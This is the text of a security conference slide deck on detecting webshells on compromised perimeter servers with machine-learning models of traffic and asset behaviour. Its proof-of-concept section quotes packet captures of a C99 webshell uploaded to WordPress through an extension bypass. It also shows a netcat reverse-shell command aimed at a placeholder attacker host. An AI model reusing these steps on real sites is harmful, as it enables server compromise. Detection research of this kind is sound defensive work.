Detection of webshells in compromised perimeter assets using ML algorithms

Detecting Webshells in Compromised
Perimeter Assets Using ML Algorithms
Rod Soto @rodsoto
Joseph Zadeh @josephzadeh

$Whoami
Rod Soto has over 15 years of experience in information technology and security. He is a security researcher and secretary
of the board of Hackmiami %27.He has spoken at ISSA, ISC2, OWASP, DEFCON, BlackHat, RSA, Hackmiami, Bsides
and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the
2012 BlackHat Las vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive
hacking Tournament series.
Joseph Zadeh studied mathematics in college and received a BS from University California, Riverside and an MS and PhD
from Purdue University. While in college, he worked in a Network Operation Center focused on security and network
performance baselines and during that time he spoke at DEFCON and Torcon security conferences. Most recently he joined
Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal
helping focused on Cyber Security analytics and also part of Kaiser Permanentes first Cyber Security R&D team.

The Perimeter
A network perimeter is the boundary between
the private and locally managed-and-owned side
of a network and the public and usually provider-
managed side of a network.*

What Are Perimeter Assets?
Perimeter assets are those infrastructure, application items that are exposed on
the internet or WAN. This may include:
- Routers
- IoTs (Cameras, RF,
- Firewalls/IDS/Load Balancers
- Servers (HTTP, DNS, IMAP, SMTP, SSH, VPN, etc)
- Yes… Cloud assets are also part of perimeter as long as they have a link,
connection, shared credentials or access from within the organization.

Perimeter Assets: First Line Of Defense
Logically perimeter assets are the first line of defense.
- Constantly under attack
- Vulnerable to unknown/0 days (I.E Heartbleed, Shellshock)
- Defenders must constantly monitor, update, patch
- Rely heavily on static signature technology, this technology is reactive,
passive
- 3rd party risks (Forgotten/Shared/Collocated, Unpatched, Unsecured APIs)

Perimeter Assets Can Become Unexpected Back
doors
Or more like a front door.... As they are exposed to the entire world, it is possible
to begin a campaign by attacking network perimeter assets and from there get
your way into the organization.
Consider this… Most organizations nowadays only expose 80 or 443, so it is
logical that web servers are prime targets as well as other internet delivered
services such as: MAIL, CMS, CRM, Dev, Storage, etc.

Do you think they might use same credentials
internally? Maybe mail clients? Storage?

Why Use A Webshell
- Stealth, compact multi functional tool
- Leverage the programming language used in
the web applications (PHP, JAVA, ASP, etc)
- Obfuscate commands appearing “web traffic”
- Covert channel using SSL/TLS

What Is A Webshell
“A web shell is a script that can be uploaded to a
web server to enable remote administration of
the machine. Infected web servers can be either
Internet-facing or internal to the network, where
the web shell is used to pivot further to internal
hosts.” US CERT

Webshells Can Be Powerful Weapons

Some Examples Of Webshells
- C99, C100
- R57
- PhpJackal (evades AV)
- Soldier of Allah (Al-qaeda webshell)
- Weevely (Terminal like webshell,
very effective, small footprint)
- AspxSpy
- WSO (Web Shell by Orb)
- China Chopper (Has thick client)
- JspWebshell
- rootshell

Common Functions Of Webshells
- Authentication
- Remote administration / C2
- File management (View, Copy, Move, Upload, Download)
- Database management/connection
- Command Shell (ls, pwd, nc, cat, etc)
- Entrenchment (create persistence via new mechanisms like NC, Python,Perl)
- Encoding/Encryption

Webshells Can Provide Further Access
- Many times attacker will place webshell then proceed to further access. Some
common next steps are:
- Stealing credentials
- Capturing traffic (Stats, behavior, protocols, etc)
- Footprinting internal network
- Local root/system exploits

How Are These Webshells Delivered?
Web shells can be delivered through a number of web application exploits or
configuration weaknesses including:
Cross-Site Scripting;
SQL Injection;
Vulnerabilities in applications/services (e.g., WordPress or other CMS
applications);
File processing vulnerabilities (e.g., upload filtering or assigned permissions);
Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;
Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned
above). *US Cert

Example Of An Exploit Campaign Using Webshell
Delivery of SamSam ransomware (2016)
- Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-4810) at exposed web server.
- Upload webshell ( jbossinvoker, zecmd, cmd, etc)
- JBoss running high on privs? No problem
- JBoss with low privs, upload local root/system exploit
- Windows box? upload PSexec (Powershell now works on *nix as well)
- Distribute ransomware (SamSam), Run MimiKatz? (PTH,PTT)

Layered ML
20
● Shades of Grey
– The layered security approach fuses multiple pieces of evidence together using a combination of models rules and
statistics to move past the traditional detection solutions
● Sequencing Security Behaviors
– The next generation SIEM indexes all outputs and outcomes and uses rules, statistics, IOC’s and intelligence along
with the fusion of ML models to build a central nervous system view of all possible risks in an environment
● Evidence Fusion: Overlay risk categories on top of each system in the
environment
– Defense Science Board, Resilient Military Systems and the Advanced Cyber Threat (Jan. 2013)

Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-
4810) at exposed web server
ML Security Use Cases
Exploit chain model analyzes new traffic for 0-days and
deliveries of malicious payload
(https://github.com/jzadeh/Aktaion)
Use Case: Webshell on DMZ Asset ML Evidence Fusion

Attacker uploads lightweight webshell on compromised
server ( jbossinvoker, zecmd, cmd, etc)
Asset discovery model monitors for changes in the asset
graph and dynamically detects assets acting out of
band from their peer group

Beachhead established and trust relationship exploited
from DMZ to LAN asset using in memory malware
Beacon model analyzes communication for C2 patterns
even when asynchronous or over small periods of
activity

Beachhead established and trust relationship exploited
from DMZ to LAN asset using in memory malware
Domain Controller is attacked and LDAP directory and
credential hashes exfiltrated
Beacon model analyzes communication for C2 patterns
even when asynchronous or over small periods of
activity
AD Tree model detects admin credentials performing out
of band sequence of behavior

Advesarial Models
• Machine Learning
Looses
Effectiveness the
more complex the
adversary

Advesarial Models
Automatable
Actions: Good for
ML
Non-Automatable
Actions: Hybrid
Human/Computer
Analysis

Operator Time is Valuable!
● Googles Experience with ML in Cybersecurity:
https://web.stanford.edu/class/cs259d/lectures/Session11.pdf

Detecting Webshells With ML: References
• https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/
• Going beyond the Indicator: https://vimeo.com/90687936
• Xin Sun, Xindai Lu, and Hua Dai. 2017. A Matrix Decomposition based Webshell Detection
Method. In Proceedings of the 2017 International Conference on Cryptography, Security and
Privacy(ICCSP '17). ACM, New York, NY, USA, 66-70. DOI:
https://doi.org/10.1145/3058060.3058083
• Ye Fei; Gong Jian; Yang Wang; Black Box Detection of Webshell Based on Support Vector
Machine School of Computer Science and Technology, Southeast University; Key Laboratory
of Computer Network Technology of Jiangsu Province:
http://en.cnki.com.cn/Article_en/CJFDTotal-NJHK201506020.htm

Lambda Defense: Webshell Decomposition

Lambda Defense: Webshell Decomposition
= Global + Local Models

How do we Detect Webshells Using ML
• New approaches in machine learning and data science can help improve detection of compromised
perimeter assets.
• Two Models of Webserver Behavior: Global Asset Behavior and Local Webserver Content Behavior
(Dynamic + Static Content)
• Local Feature Vector Answers Questions Like: How many times do users take a similar path on
the webserver? How rare is this path a user is browsing from a statistics perspective?
• Global Feature Vector Answers Questions Like: How often does this webserver communicate with
DMZ IP’s? Is there a trust relationship that has changed?

Webshell
DMZ to LAN Trust
Beyond the Indicator

How do we Detect Webshells Using ML: Global Stats
Anomalies on rare paths
U->S
S->U !!
U->U (LAN to LAN)
S->S (DMZ to LAN)!!
Desktop Server Desktop Laptop
LAN AssetDMZ Server

Seeing the Analytic In Action
Once identity resolution/learning process is complete we
create new anomalies based on new paths/actions that are
rare for a particular population profile
Lightweight Webshell
in the DMZ

How do we detect Webshells using ML...
Based on these indicators we look for sequential behaviors. For example we can
look at sequence of requests for a fixed (IP/User, Web server). We can use bro
logs, web server logs and perimeter traffic as well as long as we have visibility into
the application layer.
By determining these sequences we can discern between benign behavior and
sequences of behaviors that indicate webshell like activity.

How do we Detect Webshells Using ML: Local Stats
Using Machine Learning techniques we can compute and build up statistics around some key data points.
In the context of this particular vector we can use rare means/ low frequency count for a fixed website:
- Rare time of site usage,
- Rare time stamping and creation of files,
- Rare connection patterns, Large number of POST/GET Requests to specific file,
- Connection strings with command arguments (cmd.exe, /bin/bash, nc),
- Unusual Direct connections to files exposed to the internet,
- Unusual UA in comparison to normal traffic patterns when users, visit website or search,
engine indexing site.

Webshell detection POC/Example
For proof of concept we gather data of benign and normal browsing behavior and
then we proceeded to replicate a RFI (Remote File Inclusion) uploading a C99
webshell to target host. In this particular sequence of referrer items it can be seen
how the attacker is browsing around the site possibly foot printing and searching
for input fields.

Referrer sample sequence below shows browsing around victim web site:
-Referer: http://victimdomain/wordpress/?p=9
-Referer: http://victimdomain/wordpress/wp-content/themes/default/style.css
-Referer: http://victimdomain/wordpress/wp-content/plugins/category-grid-view-
gallery/css/style.css?ver=2.8.5
Further review of referrers show access to wordpress:
Referer: http://victimdomain/wordpress/wp-login.php
Referer: http://vicitimdomain/wordpress/wp-admin/

Webshell POC/Example
The following sequence shows the attacker accessing the post feature and
uploading a C99 shell bypassing sanitation controls by adding a .jpg extension to
the actual shell “c9920161.php”. This is done by abusing the new post feature that
includes uploading media:
00:28:39.469021 IP attackerIP.51399 > victimdomain.80:
Flags [P.], seq 13419:14264, ack 145980, win 4096,
options [nop,nop,TS val 787343940 ecr 195280],
length 845: HTTP: GET /wordpress/wp-content/plugins
/a-gallery/timthumb.php?src=http://victimdomain/
wordpress/wp-content/uploads/2016/06/c992016.php.
jpg&w=125&h=125&zc=1 HTTP/1.1...D....GET /wordpress
/wp-content/plugins/a-gallery/timthumb.php?src=http
://victimdomain/wordpress/wp-content/uploads
/2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1

Referrer: http://victimdomain/wordpress/wp-admin/post-new.php (Here is where
the web shell is uploaded)
Finally, by looking at the example for referrer sequences it can be seen how by
the attacker browsing to the web shell, frequency of access indicates a signal for
operator behavior in the sequential component of the TTP:
Referer: http://victimdomain/wordpress/?p=13
Referer: http://victimdomain/wordpress/wp-content/ uploads/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/
Referer:http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg

In the following packet capture snippet it can be seen how attacker uses netcat to send a reverse shell
utilizing C99 command execution feature:
00:33:26.996555 IP attackerIP.51421 > victimdomain.80:
Flags [P.], seq 0:1014, ack 1, win 4117, options [nop,nop,TS val 787630908 ecr 267163], length 1014:
HTTP: POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1E..*..@.@......q.......P
.....U......%........K<....POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_c8c9d8ea3e0f27d770e745c21c00f45e
=test%7C1465100854%7Cd83074c4a4a1c097c4eb44b42165d190; wp-settings-time-2=1464928107; PHPSESSID=
cav3sgkd273gafknm9pb13m467act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999&d=%2Fvar%2Fwww%2
Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F&submit=Execute&cmd_txt=1

Effective Webshell detection via machine Learning
• Webshell ML Detection Paradigm
• Two models of Behavior: Local behavior and Global Asset Behavior
• Local behavior is further broken down into individual history per path in a
Webserver. The webserver model is maintained as two separate individual
graphs one for dynamic content and one for static content
• Feature Vectors for the local content and path anomalies on a per webserver
basis are then correlated with global asset path behaviors.

Conclusion
- Machine Learning & Big data technologies enhance detection beyond the
simple static based signature defense technologies.
- It is possible to establish sequences of behaviors that indicate webshell
access and use.
- The data is already there. You can use your perimeter logs (Proxy, Firewalls,
Bro, Web Gateway, etc).
- Detection mechanisms can also be enhanced and extended by covering any
other measurable attack vector that delivers a web shell payload (SQli, XSS,
other types of RFI, etc).

Appendix
Operational ML: How to Detect Attack
Patterns That Change Over Time

Step 1: Break the problem in to use cases

Step 2: Find what use cases have highest security impact

Step 3: Decompose the problem into two types of computation

Arbitrary User Behavior = Sequential Component + “Un-
Ordered” Component

Examples
Sequential Behaviors
1. Exploit Chains
2. Timing Analysis (Periodicity)
3. Active Directory Sequence
4. Authentication Graph
Non Sequential Behaviors
1. Fingerprinting
2. Grouping Behaviors
3. Application Counts
4. Rare file extension counts for Webshell detection

Mapping Behaviors to Computational Paths
Easy to Parallelize
1. Count()
2. Average()
3. Time series()
4. Local state computations
Per user/IP/account/…
Hard to Parallelize (NC Complete Complexity)
1. Rank()
2. Median
3. Anything that keeps track of globalstate
4. Machine Learning Computations

Step 4: Build an ML Model for each important sub-behavior

Step 4: Build an ML Model for each important sub-behavior
Each Model can be batch, real-time or hybrid mode

Step 5: Operationalize the Model Life Cycle

How do we programmatically learn new patterns over time?

How do we programmatically learn new patterns over time?
When is an ML model Ready
1. When should we re-train?
2. How should new data weighted over old data?
3. How do we know when a model is ready?

The Lambda Defense: A Complex Design Pattern

67
DHCP
IMS/IPA
M
FW
Prox
yVPN
AD
Real Time Identity Resolution
Distributed
ETL
Username = select
coallesce(user_na
me, hostname, IP)
from
Active_ID_Table
where IP =
‘10.10.100.23)
IP DHCP.MAC DHCP_Lasteventtime AD_FQDN
10.100.1.23 58:5c:35:c3:6e:a4 2014-03-11T14:00:00 joe.eng.acme.com
10.13.11.221 12:3a:74:b2:6a:22 2014-03-12T14:30:00 ad.hr.acme.com
Sequential
Models and
IOC’s
Data
Ingest
Large Scale Models
and Non-Sequential
IOC’s
Real Time
Layer
Batch
Layer
Hybrid
View
(Batch +
Real
Time)

Detection of webshells in compromised perimeter assets using ML algorithms

More Related Content

Similar to Detection of webshells in compromised perimeter assets using ML algorithms (20)

More from Rod Soto (8)

Recently uploaded (20)

Detection of webshells in compromised perimeter assets using ML algorithms

Editor's Notes